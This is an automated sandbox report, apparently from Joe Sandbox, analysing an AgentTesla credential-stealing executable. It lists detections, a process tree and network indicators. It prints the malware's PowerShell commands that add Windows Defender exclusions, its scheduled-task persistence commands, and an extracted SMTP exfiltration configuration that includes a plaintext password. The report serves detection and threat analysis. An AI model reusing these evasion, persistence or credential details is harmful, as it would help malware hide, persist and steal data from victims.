
Windows Analysis Report
jKqPSehspS.exe

Overview

General Information

Sample name: jKqPSehspS.exe (renamed because the original name is a hash value)
Original sample name: 23a0eed35d69811a38633d41868a1fd6a20faf3912bde628eb556124fd6e5447.exe
Analysis ID: 1588702
MD5: 3b1b99f3617bbe21d2bd1601e6ce73ee
SHA1: 0ba6e0fe3c8f5a0511694421d841c377c1a4dae5
SHA256: 23a0eed35d69811a38633d41868a1fd6a20faf3912bde628eb556124fd6e5447
Tags: AgentTesla, exe, user-adrian__luca

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • jKqPSehspS.exe (PID: 1308 cmdline: "C:\Users\user\Desktop\jKqPSehspS.exe" MD5: 3B1B99F3617BBE21D2BD1601E6CE73EE)
    • powershell.exe (PID: 6352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3484 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BLpvFR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6860 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3956 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • jKqPSehspS.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\jKqPSehspS.exe" MD5: 3B1B99F3617BBE21D2BD1601E6CE73EE)
  • BLpvFR.exe (PID: 2660 cmdline: C:\Users\user\AppData\Roaming\BLpvFR.exe MD5: 3B1B99F3617BBE21D2BD1601E6CE73EE)
    • schtasks.exe (PID: 7344 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BLpvFR.exe (PID: 7408 cmdline: "C:\Users\user\AppData\Roaming\BLpvFR.exe" MD5: 3B1B99F3617BBE21D2BD1601E6CE73EE)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Extracted configuration: {"Exfil Mode": "SMTP", "Port": "25", "Host": "mail.iaa-airferight.com", "Username": "mail@iaa-airferight.com", "Password": "Asaprocky11"}
Source | Rule | Description | Author | Strings
0000000E.00000002.3946194292.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000009.00000002.3946068127.0000000002F21000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000009.00000002.3946068127.0000000002F21000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author | Strings
0.2.jKqPSehspS.exe.4259970.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.jKqPSehspS.exe.4259970.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.jKqPSehspS.exe.4259970.1.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x316f7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x31769:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x317f3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x31885:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x318ef:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x31961:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x319f7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x31a87:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.jKqPSehspS.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
9.2.jKqPSehspS.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\jKqPSehspS.exe", ParentImage: C:\Users\user\Desktop\jKqPSehspS.exe, ParentProcessId: 1308, ParentProcessName: jKqPSehspS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe", ProcessId: 6352, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\BLpvFR.exe, ParentImage: C:\Users\user\AppData\Roaming\BLpvFR.exe, ParentProcessId: 2660, ParentProcessName: BLpvFR.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp", ProcessId: 7344, ProcessName: schtasks.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 46.175.148.58, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Users\user\Desktop\jKqPSehspS.exe, Initiated: true, ProcessId: 6784, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49708
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\jKqPSehspS.exe", ParentImage: C:\Users\user\Desktop\jKqPSehspS.exe, ParentProcessId: 1308, ParentProcessName: jKqPSehspS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp", ProcessId: 3956, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\jKqPSehspS.exe", ParentImage: C:\Users\user\Desktop\jKqPSehspS.exe, ParentProcessId: 1308, ParentProcessName: jKqPSehspS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe", ProcessId: 6352, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\jKqPSehspS.exe", ParentImage: C:\Users\user\Desktop\jKqPSehspS.exe, ParentProcessId: 1308, ParentProcessName: jKqPSehspS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp", ProcessId: 3956, ProcessName: schtasks.exe
No Suricata rule has matched

AV Detection

Source: 0.2.jKqPSehspS.exe.4294390.0.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "25", "Host": "mail.iaa-airferight.com", "Username": "mail@iaa-airferight.com", "Password": "Asaprocky11"}
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | ReversingLabs: Detection: 91%
Source: jKqPSehspS.exe | Virustotal: Detection: 79%
Source: jKqPSehspS.exe | ReversingLabs: Detection: 91%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Joe Sandbox ML: detected
Source: jKqPSehspS.exe | Joe Sandbox ML: detected
Source: jKqPSehspS.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: jKqPSehspS.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Yara match | File source: 0.2.jKqPSehspS.exe.4294390.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.jKqPSehspS.exe.4259970.1.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.8:59576 -> 162.159.36.2:53
Source: Joe Sandbox View | IP Address: 104.26.12.205
Source: Joe Sandbox View | IP Address: 46.175.148.58
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: global traffic | TCP traffic: 192.168.2.8:49708 -> 46.175.148.58:25
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0; Host: api.ipify.org; Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: mail.iaa-airferight.com
Source: global traffic | DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: jKqPSehspS.exe, BLpvFR.exe.0.dr | String found in binary or memory: http://localhost/arkanoid_server/requests.php
Source: jKqPSehspS.exe, 00000009.00000002.3946068127.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp, BLpvFR.exe, 0000000E.00000002.3946194292.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.iaa-airferight.com
Source: jKqPSehspS.exe, 00000000.00000002.1534303990.0000000003286000.00000004.00000800.00020000.00000000.sdmp, jKqPSehspS.exe, 00000009.00000002.3946068127.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, BLpvFR.exe, 0000000A.00000002.1573785874.0000000002756000.00000004.00000800.00020000.00000000.sdmp, BLpvFR.exe, 0000000E.00000002.3946194292.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: jKqPSehspS.exe, 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp, jKqPSehspS.exe, 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: jKqPSehspS.exe, 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp, jKqPSehspS.exe, 00000009.00000002.3946068127.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, jKqPSehspS.exe, 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp, BLpvFR.exe, 0000000E.00000002.3946194292.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: jKqPSehspS.exe, 00000009.00000002.3946068127.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, BLpvFR.exe, 0000000E.00000002.3946194292.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: jKqPSehspS.exe, 00000009.00000002.3946068127.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, BLpvFR.exe, 0000000E.00000002.3946194292.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/t
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\jKqPSehspS.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\jKqPSehspS.exe
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\BLpvFR.exe
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 0.2.jKqPSehspS.exe.4259970.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.jKqPSehspS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.jKqPSehspS.exe.4294390.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.jKqPSehspS.exe.4294390.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.jKqPSehspS.exe.4259970.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 0_2_0150DF14
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 0_2_07944730
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 0_2_079442F8
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 0_2_07945F70
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 0_2_07943EC0
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 0_2_0794BD08
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 0_2_07945B38
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 9_2_0126A968
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 9_2_01264A98
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 9_2_01263E80
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 9_2_012641C8
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 9_2_0126F8A5
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 9_2_06AE45A0
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 9_2_06AE5D30
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 9_2_06AE3578
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 9_2_06AE0338
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 9_2_06AEE0B9
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 9_2_06AE91F0
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 9_2_06AEA140
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 9_2_06AE5650
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 9_2_06AE3CA0
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Code function: 9_2_06AEC358
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 10_2_00D0DF14
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 10_2_05951140
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 10_2_05951130
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 10_2_06FF3EC0
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 10_2_06FF5F70
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 10_2_06FF4730
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 10_2_06FF42F8
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 10_2_06FFABA8
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 10_2_06FF5B38
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_0128A182
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_0128A968
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_0128DBE0
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_01284A98
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_01283E80
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_012841C8
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_0128E4D0
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_068945A0
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_06895D30
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_06893578
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_0689E0B9
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_06891030
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_068991E0
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_0689A140
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_06895650
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_06893C8F
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_06890328
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Code function: 14_2_0689C358
Source: jKqPSehspS.exe, 00000000.00000002.1520573879.000000000134E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs jKqPSehspS.exe
Source: jKqPSehspS.exe, 00000000.00000002.1534303990.000000000329C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs jKqPSehspS.exe
Source: jKqPSehspS.exe, 00000000.00000002.1520573879.00000000013D9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShe vs jKqPSehspS.exe
Source: jKqPSehspS.exe, 00000000.00000002.1534303990.0000000003286000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename8854fa4e-ee03-4899-b0c3-2df80b3f7614.exe4 vs jKqPSehspS.exe
Source: jKqPSehspS.exe, 00000000.00000000.1475642417.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamejNDn.exe0 vs jKqPSehspS.exe
Source: jKqPSehspS.exe, 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename8854fa4e-ee03-4899-b0c3-2df80b3f7614.exe4 vs jKqPSehspS.exe
Source: jKqPSehspS.exe, 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs jKqPSehspS.exe
Source: jKqPSehspS.exe, 00000000.00000002.1538657428.0000000005A60000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs jKqPSehspS.exe
Source: jKqPSehspS.exe, 00000000.00000002.1539533176.00000000078A0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs jKqPSehspS.exe
Source: jKqPSehspS.exe, 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilename8854fa4e-ee03-4899-b0c3-2df80b3f7614.exe4 vs jKqPSehspS.exe
Source: jKqPSehspS.exe, 00000009.00000002.3942862074.0000000000F39000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs jKqPSehspS.exe
Source: jKqPSehspS.exe | Binary or memory string: OriginalFilenamejNDn.exe0 vs jKqPSehspS.exe
Source: 0.2.jKqPSehspS.exe.4259970.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.jKqPSehspS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.jKqPSehspS.exe.4294390.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.jKqPSehspS.exe.4294390.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.jKqPSehspS.exe.4259970.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: jKqPSehspS.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BLpvFR.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@3/2
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeFile created: C:\Users\user\AppData\Roaming\BLpvFR.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeFile created: C:\Users\user\AppData\Local\Temp\tmp89B.tmpJump to behavior
                    Source: jKqPSehspS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: jKqPSehspS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: jKqPSehspS.exeVirustotal: Detection: 79%
                    Source: jKqPSehspS.exeReversingLabs: Detection: 91%
